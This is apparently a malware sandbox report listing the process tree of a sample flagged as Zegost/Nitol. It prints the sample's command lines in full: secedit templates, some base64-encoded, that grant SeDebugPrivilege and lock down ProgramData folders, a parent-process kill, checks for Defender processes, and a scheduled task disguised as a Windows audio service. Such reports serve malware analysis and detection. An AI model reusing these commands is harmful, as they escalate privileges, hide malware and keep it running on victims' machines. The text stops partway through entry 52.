Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:03:27
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:03:28
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:03:28
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:03:29
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:03:29
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:03:31
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=5800').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:03:31
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe"
Imagebase:	0x7ff7e3ce0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe"
Imagebase:	0x1a0000
File size:	3'149'120 bytes
MD5 hash:	C4C5317AC1AB7077C53DB6D82B2A119F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0x950000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Imagebase:	0x950000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Imagebase:	0x950000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6068e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:03:52
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0x950000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6536, Parent PID: 1196

General

Target ID:	25
Start time:	10:03:53
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:03:53
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c echo.>c:\inst.ini
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:03:53
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:03:54
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Imagebase:	0x7ff6a5670000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:03:54
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Imagebase:	0x330000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	10:03:55
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0x330000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	10:03:55
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0x330000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	10:03:55
Start date:	29/12/2024
Path:	C:\ProgramData\Program\iusb3mon.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\program\iusb3mon.exe
Imagebase:	0x570000
File size:	3'149'120 bytes
MD5 hash:	C4C5317AC1AB7077C53DB6D82B2A119F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	10:03:56
Start date:	29/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	10:03:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	10:03:57
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	10:03:57
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	10:03:57
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	10:03:57
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:	0x5e0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	10:04:04
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7592, Parent PID: 7576

General

Target ID:	41
Start time:	10:04:04
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	10:04:06
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Imagebase:	0x950000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: powershell.exePID: 7708, Parent PID: 3680

General

Target ID:	43
Start time:	10:04:06
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Imagebase:	0x950000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7716, Parent PID: 7700

General

Target ID:	44
Start time:	10:04:06
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	10:04:06
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
Imagebase:	0x950000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7732, Parent PID: 7708

General

Target ID:	46
Start time:	10:04:06
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	10:04:06
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	10:04:10
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
Imagebase:	0x330000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	10:04:10
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Imagebase:	0x330000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	10:04:10
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\SecEdit.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Imagebase:	0x330000
File size:	37'888 bytes
MD5 hash:	BFC13856291E4B804D33BBAEFC8CB3B5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	10:04:11
Start date:	29/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"LxN_oT.exe\"));
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8140, Parent PID: 8132

General

Target ID:	52
Start time:	10:04:11
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
